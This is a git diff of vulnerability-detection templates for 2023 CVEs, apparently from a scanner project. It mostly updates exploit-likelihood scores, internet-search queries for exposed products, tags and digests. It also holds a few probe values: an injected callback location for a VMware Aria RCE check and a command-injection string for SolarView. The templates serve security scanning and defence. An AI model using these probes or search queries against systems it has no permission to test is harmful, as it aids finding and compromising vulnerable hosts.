title="vmware aria operations" + google-query: + - intitle:"vmware aria operations" + - intitle:"vmware vrealize network insight" tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive variables: payload: location='http://{{interactsh-url}}' @@ -86,4 +95,4 @@ http: - csrfToken":"([a-z0-9A-Z/+=]+)" internal: true part: body -# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cc967f4799e1f52f790f398c5f0b0a947724d461556ccc1708d0cb829adac397022018b0efe5f3c5116e10afaa6b1d72e44f5d01446a662bbd438ef71d8324b1fd5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2122.yaml b/http/cves/2023/CVE-2023-2122.yaml index 3ef490f294..6985485ce7 100644 --- a/http/cves/2023/CVE-2023-2122.yaml +++ b/http/cves/2023/CVE-2023-2122.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2122 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:* metadata: verified: "true" @@ -47,4 +47,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Image optimizer")' condition: and -# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff7eec23d31c4531488ff4f882dea2d85dc65b726ccc6fa85783372d799fce38022100acd0f707b454a6339756cba8d26a33028d885b6b685c2c6c4c2757babac9e5c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2130.yaml b/http/cves/2023/CVE-2023-2130.yaml index ccc03dcaa9..6056d6df45 100644 --- a/http/cves/2023/CVE-2023-2130.yaml +++ b/http/cves/2023/CVE-2023-2130.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-2130 cwe-id: CWE-89 - epss-score: 0.01554 - epss-percentile: 0.85779 + epss-score: 0.02537 + epss-percentile: 0.9017 cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:* metadata: verified: "true" @@ -44,4 +44,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "Supplier Name")' condition: and -# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008eedd613cb556e22c44c4adb41769b57907a6fc43c8de121b942339738e6bb6102210093d2e29ef6542d0d18cc3e9a1cbedf51462c61250e47f1a3ed1e83f009a3052e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2178.yaml b/http/cves/2023/CVE-2023-2178.yaml index 3731dd9ca1..e1f8bdd6b9 100644 --- a/http/cves/2023/CVE-2023-2178.yaml +++ b/http/cves/2023/CVE-2023-2178.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-2178 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.3232 + epss-percentile: 0.33655 cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,4 @@ http: - 'contains(body_2, ">")' - 'contains(body_2, "page_aajoda-testimonials")' condition: and -# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a8e5a63e79c6b4ec11e580b7171aeb1565b9cea7a93e3f3b319c86f146b988f4022100837c8e9be1ea6bfa4b45912eb8c52e27444309294181ba829334a2b88b5e84cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22232.yaml b/http/cves/2023/CVE-2023-22232.yaml index 06d086c21f..e13e15b717 100644 --- a/http/cves/2023/CVE-2023-22232.yaml +++ b/http/cves/2023/CVE-2023-22232.yaml @@ -16,15 +16,19 @@ info: cvss-score: 5.3 cve-id: CVE-2023-22232 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.13033 - epss-percentile: 0.95385 + epss-score: 0.12731 + epss-percentile: 0.95463 cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: adobe product: connect - shodan-query: title:"Adobe Connect" + shodan-query: + - title:"Adobe Connect" + - http.title:"openvpn connect" + fofa-query: title="openvpn connect" + google-query: intitle:"openvpn connect" tags: packetstorm,cve2023,cve,adobe,lfd,download http: @@ -44,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d33658fadb0c3b76af58bde6da9db8df7fb5aaa693f34c25111a6a7599092d93022074ca5a695e763d3b2e8d2ccd96f1a2005c6400c8ffed5d784e9d494b2d71fcb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2224.yaml b/http/cves/2023/CVE-2023-2224.yaml index c9390d770b..fa1d8fe4ce 100644 --- a/http/cves/2023/CVE-2023-2224.yaml +++ b/http/cves/2023/CVE-2023-2224.yaml @@ -15,8 +15,8 @@ info: cvss-score: 4.8 cve-id: CVE-2023-2224 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41348 + epss-score: 0.00101 + epss-percentile: 0.41469 cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -68,4 +68,4 @@ http: regex: - 'name="nonce_wdseo" value="([a-z0-9]+)" \/>' internal: true -# digest: 4b0a0048304602210094d1da811d59592837714673bb306836a768a2450c197630671c366a384f87e9022100f3be739f36993a986b5f670b0004217e59026284faa1930c92203169e6fbfa64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100893365651019a48974c7772404a1a5e1bf1c27191b6661d84a796cb9fedcc462022100bba9224e520251fcd68ade3f4fbcfa7557380dfd77eeec46970f3ea8f930d78a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2227.yaml b/http/cves/2023/CVE-2023-2227.yaml index 827e860014..d93861793a 100644 --- a/http/cves/2023/CVE-2023-2227.yaml +++ b/http/cves/2023/CVE-2023-2227.yaml @@ -15,12 +15,20 @@ info: cvss-score: 9.1 cve-id: CVE-2023-2227 cwe-id: CWE-285 + epss-score: 0.01292 + epss-percentile: 0.85804 cpe: cpe:2.3:a:modoboa:modoboa:*:*:*:*:*:*:*:* metadata: + max-request: 1 vendor: modoboa product: modoboa - fofa-query: body="Modoboa" - shodan-query: http.favicon.hash:1949005079 + shodan-query: + - "http.favicon.hash:1949005079" + - http.html:"modoboa" + fofa-query: + - "body=\"Modoboa\"" + - body="modoboa" + - icon_hash=1949005079 tags: cve,cve2023,modoboa,exposure,disclosure http: @@ -48,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204ab95cad35e5dc938efd7d6b61c067c225b1b5db05ba420a90b83c3e944f7e43022044d08dd4379dc38acdb9b5a5aeb2cffcd30d0a608aea1c9e622135c2f087db39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7d83db7d46a24d08eec0c032ad6c29a7a7494a213f3e776a07822b39ec60d36022100a8f268ac9f2e5148f379aca1009ae0eef306dbf32483549bf1e6a945f901514b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22432.yaml b/http/cves/2023/CVE-2023-22432.yaml index 4e668bef11..8291fc8a27 100644 --- a/http/cves/2023/CVE-2023-22432.yaml +++ b/http/cves/2023/CVE-2023-22432.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-22432 cwe-id: CWE-601 - epss-score: 0.00877 - epss-percentile: 0.82098 + epss-score: 0.00945 + epss-percentile: 0.83107 cpe: cpe:2.3:a:web2py:web2py:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: web2py product: web2py shodan-query: http.favicon.hash:-1680052984 + fofa-query: icon_hash=-1680052984 tags: cve,cve2023,web2py,redirect,authenticated http: @@ -54,4 +55,4 @@ http: - type: status status: - 303 -# digest: 490a0046304402207f782b159b26b41f6b49ca4263a7106cbc2ef40aba7e1c835f44948dcd5c9731022035bed350905f56247f1d8d9aef6e107d58accb233e8ebb5bc8e8e2f78363f2c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e32d205cdc41979a8510ec3c5491b73e578f35e1f2c728a0834360098b8c21502203fc65ab87a9ec06204ed5ee8392f6a8063e68afa34cdd393f968fe8081616137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22463.yaml b/http/cves/2023/CVE-2023-22463.yaml index a138f73917..f0d3e27a0e 100644 --- a/http/cves/2023/CVE-2023-22463.yaml +++ b/http/cves/2023/CVE-2023-22463.yaml @@ -20,16 +20,20 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22463 cwe-id: CWE-798 - epss-score: 0.02033 - epss-percentile: 0.88693 + epss-score: 0.01936 + epss-percentile: 0.88621 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve,cve2023,kubepi,k8s,auth-bypass,fit2cloud variables: name: "{{rand_base(6)}}" @@ -78,4 +82,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048f769f84bc3e713a4aaf0510d2310cf2fa4c1f267e818f139d8c2c695d75af6022035cac70cbbb1ca8758491a2c026365cf8f96d067cdb375d4f3f2570a28171663:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202265c5fa40bded52f5e8d2130f2d27af861da734d28cd2a5338de7112287ae1d022100aafd34d4cce0c6a2038766f4773177ea1a95d3e6c7420e202620ebe1e99e90fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml index cb4ece937a..1ab9823e18 100644 --- a/http/cves/2023/CVE-2023-22478.yaml +++ b/http/cves/2023/CVE-2023-22478.yaml @@ -21,16 +21,20 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22478 cwe-id: CWE-862 - epss-score: 0.03365 - epss-percentile: 0.91177 + epss-score: 0.07825 + epss-percentile: 0.94208 cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fit2cloud product: kubepi - shodan-query: html:"kubepi" - fofa-query: "kubepi" + shodan-query: + - html:"kubepi" + - http.html:"kubepi" + fofa-query: + - "kubepi" + - body="kubepi" tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud http: @@ -61,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a3a8ab93d344a4ea4552af7e38e910f1d753961585a43185a1c2aceb03385e1022100a393cf6a17ba4fc35342bd2c698a9bc9fb108546b52580c6bff53c0a76f26fe5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100841f75f7adf2389cf7a570922f44d7110997635e8309b7f0425d409e109c43cf022100827826a9ea50e2a08cd006fdcb484b4b19ec720844111041640be6e0c75717fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml index bb42a9d8b3..9a813a2ba7 100644 --- a/http/cves/2023/CVE-2023-22480.yaml +++ b/http/cves/2023/CVE-2023-22480.yaml @@ -21,16 +21,21 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22480 cwe-id: CWE-863,CWE-285 - epss-score: 0.01487 - epss-percentile: 0.86532 + epss-score: 0.03554 + epss-percentile: 0.91598 cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fit2cloud product: kubeoperator - shodan-query: html:"KubeOperator" - fofa-query: app="KubeOperator" + shodan-query: + - html:"KubeOperator" + - http.html:"kubeoperator" + fofa-query: + - app="KubeOperator" + - body="kubeoperator" + - app="kubeoperator" tags: cve2023,cve,kubeoperator,k8s,kubeconfig,exposure,fit2cloud http: @@ -55,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee12904d65e9c992c05a8c326ff56e80b778ef16acda7ced68f94e57609f2c58022100cb41bf91ee715b8d3da808ba74a8e3bf043eb12511541341d3ede714a88843e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f523e1f7b686395863572e0b76d481b4d2183ad5758e83adb8e721ce0214aa3702210086811079cc91bc1fda244f017f919e17786b27c27a78da59c9757fadb6024e13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22515.yaml b/http/cves/2023/CVE-2023-22515.yaml index e27bd57a93..05ae449ee4 100644 --- a/http/cves/2023/CVE-2023-22515.yaml +++ b/http/cves/2023/CVE-2023-22515.yaml @@ -18,15 +18,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-22515 - epss-score: 0.95682 - epss-percentile: 0.99291 + epss-score: 0.97313 + epss-percentile: 0.99875 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 vendor: atlassian product: confluence_data_center - fofa-query: app="ATLASSIAN-Confluence" + shodan-query: http.component:"atlassian confluence" + fofa-query: + - app="ATLASSIAN-Confluence" + - app="atlassian-confluence" tags: cve2023,cve,confluence,auth-bypass,kev,intrusive,atlassian variables: username: "{{rand_base(10)}}" @@ -79,4 +82,4 @@ http: dsl: - '"USER: "+ username' - '"PASS: "+ password' -# digest: 4a0a00473045022100ac6a95dafe4fdeff2f77958d55a402758e31fd3369fc22f5db6c8b1ea6951ec7022071d32dfbe93ae322d8d02e50d17dd9bbeace387055752ba20184441546549d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a9d0795ba62637f47dc6d02cc1c50e32fe11f86f71f2c150516a195a769511b02207a5e7c145c4540a48e68f58facda04702d6fedcbbaf4ce1356b42bd67cec5cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22518.yaml b/http/cves/2023/CVE-2023-22518.yaml index f78c29e559..021d4f6ca0 100644 --- a/http/cves/2023/CVE-2023-22518.yaml +++ b/http/cves/2023/CVE-2023-22518.yaml @@ -18,15 +18,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22518 cwe-id: CWE-863 - epss-score: 0.97011 - epss-percentile: 0.99725 + epss-score: 0.96267 + epss-percentile: 0.99528 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + fofa-query: app="atlassian-confluence" note: this template attempts to validate the vulnerability by uploading an invalid (empty) zip file. This is a safe method for checking vulnerability and will not cause data loss or database reset. In real attack scenarios, a malicious file could potentially be used causing more severe impacts. tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev @@ -58,4 +61,4 @@ http: - "status_code == 200" - "contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')" condition: and -# digest: 4b0a00483046022100bfe2427057a021c02b45e8933fad188130ca08bbb54211b7d88907f02834dce6022100d073c6584b72693b5d1493b8fc4df8ff572a6c26046d83a428f83dfba54cec0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c195f24c467633a655a09478290444a51a6013d76400aed9493de7194bf9a9f9022100a2d098705275126161b0838e780fcda164c7be37e521c776868fab2645fc7c0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2252.yaml b/http/cves/2023/CVE-2023-2252.yaml index 22fe7e3409..e3c5432846 100644 --- a/http/cves/2023/CVE-2023-2252.yaml +++ b/http/cves/2023/CVE-2023-2252.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-2252 cwe-id: CWE-22 epss-score: 0.00129 - epss-percentile: 0.46802 + epss-percentile: 0.4773 cpe: cpe:2.3:a:wpwax:directorist:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +27,7 @@ info: vendor: wpwax product: directorist framework: wordpress - tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated + tags: cve2023,cve,wpscan,lfi,directorist,wordpress,wp-plugin,wp,authenticated,wpwax http: - raw: @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022076aa83db4416dab98b44af5bbef532fbcc276d86523e0cbb68791c6f23624d9202204df4ce1bc02f82a0e4f75d2b8dbdc207c612b747fd45f47dc8ba90350a1674a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c337ce3ced7650a1c24425481fccaa77c8acf66283da5f411e016027e99ff6302205842cc4a2f064fefdd242fc3f2ea0465de309982a6b60fc5097484163c47b3dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22527.yaml b/http/cves/2023/CVE-2023-22527.yaml index aaed7fb243..b9515cb817 100644 --- a/http/cves/2023/CVE-2023-22527.yaml +++ b/http/cves/2023/CVE-2023-22527.yaml @@ -18,15 +18,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-22527 cwe-id: CWE-74 - epss-score: 0.96568 - epss-percentile: 0.99595 + epss-score: 0.97459 + epss-percentile: 0.99955 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: atlassian product: confluence_data_center - shodan-query: http.component:"Atlassian Confluence" - tags: cve,cve2023,confluence,rce,ssti,kev + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + fofa-query: app="atlassian-confluence" + tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian http: - raw: @@ -49,4 +52,4 @@ http: - type: dsl dsl: - x_vuln_check # prints the output of whoami -# digest: 490a0046304402207a2fdad5fe27eb6c457c1bdac60461a10e3dd24f3b61a3883903ef1492f18d7202203ef5a8e34b86a3e1e139c76a3daee72643cb00ae3205564fa729bf4ce9a148ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fa6c35d659a974b6867c95930ac86f66793ea4d356020f683caf9a3d230b537022100e3945d678c3fd19fc638795f92994422bb73daa19901590a03760bf937f7b73e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml index ab98f22962..53899c9c47 100644 --- a/http/cves/2023/CVE-2023-22620.yaml +++ b/http/cves/2023/CVE-2023-22620.yaml @@ -20,15 +20,19 @@ info: cvss-score: 7.5 cve-id: CVE-2023-22620 cwe-id: CWE-863 - epss-score: 0.06157 - epss-percentile: 0.92833 + epss-score: 0.03698 + epss-percentile: 0.91758 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,utm,leak,memory,packetstorm,securepoint http: @@ -71,4 +75,4 @@ http: regex: - '"sessionid": "([a-z0-9]+)"' internal: true -# digest: 490a004630440220534282c43668c1c17af9cf7ca5cdb4ae4bbf009790f5d229d10fbd4129fe1b34022073d7f8756dba9051bceecff5bb2af4da03f6abfd1f4becbb46f585324c435ba0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005e917854de14505ee6a5e3560d7d1a8618149cb2074378f2b420bcd9ef629e7022100a7404d0a575179049ed915c41286482d0d6d965629ca16b5eba4341b6f9950c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml index b159a55c12..b90affafa9 100644 --- a/http/cves/2023/CVE-2023-2272.yaml +++ b/http/cves/2023/CVE-2023-2272.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-2272 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26204 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -53,4 +53,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "Tiempo")' condition: and -# digest: 4a0a00473045022100e95f455156aec7ad579fbca4f3894390f4c3828cdfb03bdc3f1476c3194bac0302205af112e2d4a7bd057125852239530818792a4b650e41ff76eb49e3d5fe85c594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e5df4e755941197a8a9e2b7ea2c47fa26d6a10d4761122622cc0af24b7ffba7e02205cd5b5968e669da5518df4c6dc585b02292aada0f3eb00691be0ba9acd56b59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml index d52b60279c..0b4f764200 100644 --- a/http/cves/2023/CVE-2023-22897.yaml +++ b/http/cves/2023/CVE-2023-22897.yaml @@ -15,20 +15,25 @@ info: - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2023-22897.txt - https://www.rcesecurity.com/2023/04/securepwn-part-2-leaking-remote-memory-contents-cve-2023-22897/ - https://rcesecurity.com + - https://github.com/MrTuxracer/advisories classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2023-22897 cwe-id: CWE-908 - epss-score: 0.03131 - epss-percentile: 0.90084 + epss-score: 0.03238 + epss-percentile: 0.91228 cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: securepoint product: unified_threat_management - shodan-query: title:"Securepoint UTM" + shodan-query: + - title:"Securepoint UTM" + - http.title:"securepoint utm" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2023,securepoint,utm,exposure,memory http: @@ -57,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5379821457ef92f3e634b3aa210084805f8dfebe4025face5ad541fa49a074802206972fe09c5c8eafeb44d04cbda0c68080ea1354dc53a9c44f5d65a679d398e06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba36b5271817f0459fb098fdd2c1a7550576e5914b44eebba4653e2ce6d5ac19022100c4a84f9e130aa98528b5b5a9a00c09f8bb14967362d704318e1810971defb594:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml index 4ae8b59b80..ff47a14973 100644 --- a/http/cves/2023/CVE-2023-23161.yaml +++ b/http/cves/2023/CVE-2023-23161.yaml @@ -21,16 +21,18 @@ info: cvss-score: 6.1 cve-id: CVE-2023-23161 cwe-id: CWE-79 - epss-score: 0.00107 - epss-percentile: 0.43178 + epss-score: 0.00315 + epss-percentile: 0.702 cpe: cpe:2.3:a:phpgurukul:art_gallery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: phpgurukul product: art_gallery_management_system - fofa-query: title="Art Gallery Management System" - tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project + fofa-query: + - title="Art Gallery Management System" + - title="art gallery management system" + tags: cve2023,cve,packetstorm,art,gallery,xss,art_gallery_management_system_project,phpgurukul http: - method: GET @@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea898a0ee3e7998bb3be0741ebb31686b6746789bfc38aa09c3d751d6c088dd9022100f24fab6cecd2ddc7672fa6f8c51dfc9851aed21ab09178b2994b03ef0a42b92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d7208d5230ec463f1ea5043d8ba95a0a0085662a9af3eb4642b4bedb565306f0022100c7442bc3c595a32bbadf5ab28025e4022ce0664213b14b32d26e347957f76fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml index de9d21f533..733368f126 100644 --- a/http/cves/2023/CVE-2023-23333.yaml +++ b/http/cves/2023/CVE-2023-23333.yaml @@ -21,16 +21,24 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23333 cwe-id: CWE-77 - epss-score: 0.40081 - epss-percentile: 0.96928 + epss-score: 0.96326 + epss-percentile: 0.99545 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: solarview_compact_firmware - shodan-query: http.html:"SolarView Compact" - fofa-query: body="SolarView Compact" && title="Top" + shodan-query: + - http.html:"SolarView Compact" + - http.favicon.hash:"-244067125" + - http.html:"solarview compact" + - cpe:"cpe:2.3:o:contec:solarview_compact_firmware" + fofa-query: + - body="SolarView Compact" && title="Top" + - body="solarview compact" && title="top" + - icon_hash="-244067125" + - body="solarview compact" tags: cve,cve2023,packetstorm,solarview,rce,contec variables: cmd: "echo+CVE-2023-23333|rev" @@ -57,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207bfb7fc9356679873674bfb87b497551fbe9df9d6015d6c609aad585022a83ec022100eb1090e63e1b40864063314df8fad93909dea07395360cb4ec508212ee04d940:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009fd301a49f781f20f79d27691a17df28fa811e791487a27f5f9a01786667c31c022001ba5c53e062dc8f144f958b19d7064d2f69ad1d9b92d0aa426ca44268bc153c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml index cc92209152..9c9afb6f06 100644 --- a/http/cves/2023/CVE-2023-23488.yaml +++ b/http/cves/2023/CVE-2023-23488.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23488 cwe-id: CWE-89 - epss-score: 0.05507 - epss-percentile: 0.92486 + epss-score: 0.05363 + epss-percentile: 0.93093 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -30,6 +30,10 @@ info: vendor: strangerstudios product: paid_memberships_pro framework: wordpress + shodan-query: http.html:/wp-content/plugins/paid-memberships-pro/ + fofa-query: body=/wp-content/plugins/paid-memberships-pro/ + publicwww-query: /wp-content/plugins/paid-memberships-pro/ + google-query: inurl:"/wp-content/plugins/paid-memberships-pro" tags: cve2023,cve,paid-memberships-pro,wordpress,tenable,packetstorm,wp-plugin,sqli,wp,strangerstudios http: @@ -49,4 +53,4 @@ http: - status_code_1 != 403 # Wordfence - contains(body_2, "pmpro_updates") condition: and -# digest: 490a00463044022015c188952fcdb9afb70b9a5d2751a7a6b30e64a2e70652f54f09e9f340e236f202203acc5d2c37b01961a2b0901d983aa12ac70bfef13910d8cb846454bb17078d40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207aa83e6f293f332c02d8a9ada084af631fa84e58635b0ee65df029638fbd3409022048777f3132bb7ea017b47e5853e7742ade34d05d38b4da9edd3d8380dd197634:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml index d6f8c53b56..3238ae18db 100644 --- a/http/cves/2023/CVE-2023-23489.yaml +++ b/http/cves/2023/CVE-2023-23489.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-23489 cwe-id: CWE-89 - epss-score: 0.10655 - epss-percentile: 0.94927 + epss-score: 0.11793 + epss-percentile: 0.95309 cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -49,4 +49,4 @@ http: - 'status_code_1 == 200' - 'contains(body_1, "[]") && contains(body_2, "Easy Digital Downloads")' condition: and -# digest: 